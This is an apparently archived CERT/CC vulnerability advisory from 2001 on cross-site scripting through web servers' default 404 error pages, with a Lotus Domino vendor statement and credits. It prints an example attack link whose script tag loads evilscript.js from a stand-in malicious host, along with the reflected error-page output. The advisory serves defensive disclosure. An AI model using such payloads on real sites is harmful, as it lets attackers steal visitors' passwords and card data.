The essence of cross-site scripting is that an intruder causes a legitimate web server to send a page to a victim's web browser that contains malicious script or HTML of the intruder's choosing. The malicious script runs with the privileges of a legitimate script originating from the legitimate web server.
Several server applications are vulnerable to such an technique via various default error pages.
For example, A valid URL request might be
However, if the requested document "FILENAME.html" did not exist, the web site could return an error message such as:
404 page does not exist: FILENAME.html
Notice that "FILENAME.html" is a string that was inputed by a user and is included in the page returned by the web site straight through to the client's browser.
If a malicious web site existed that offered a link to example.com that looked something like this
<A HREF="http://www.example.com/<script%20SRC='http://www.malicioussite.com/evilscript.js'></script>">Click Here</a>
The "FILENAME.html" submitted to example.com is
example.com then uses its ordinary routines to generate an error page to you that
404 page not found: <script SRC='http://www.malicioussite.com/evilscript.js'></script>
The ultimate fix to this problem involves recoding a very large number of web sites so that they properly filter and validate the input they receive and properly encode or filter the output before returning it to the user or acting upon it. This process is a very large undertaking.
The victim will be presented with information which the compromised site did not wish their visitors to be subjected. This could be used to "sniff" sensitive data from within the web page, including passwords, credit card numbers, and any arbitrary information the user inputs.
The CERT/CC is currently unaware of a practical solution to this problem.
Filter by status: All Affected Not Affected Unknown
Filter by content: __ Additional information available
__ Sort by: Status Alphabetical
Notified: March 18, 2001 Updated: July 18, 2001
This was reproduced and documented as SPR #JCHN4V2HUY. We are currently researching a fix and have plans to address in Domino R5.0.9. When the fix is available, it will be documented at <http://www.notes.net/r5fixlist.nsf>.
The vendor has not provided us with any further information regarding this vulnerability.
The CERT/CC has no additional comments at this time.
If you have feedback, comments, or additional information about this vulnerability, please send us email.
Group | Score | Vector
Base | N/A | N/A
Temporal | N/A | N/A
Environmental | | N/A
Our thanks to Hiromitsu Takagi, who discovered this instance of the cross-site scripting vulnerability.
This document was originally written by Shawn Hernan in July 2000. It has been adapted for this instance by Jason Rafail.
CVE IDs: | None
Severity Metric: | 55.69
Date Public: | 2001-07-02
Date First Published: | 2001-07-27
Date Last Updated: | 2001-07-30 19:00 UTC
Document Revision: | 17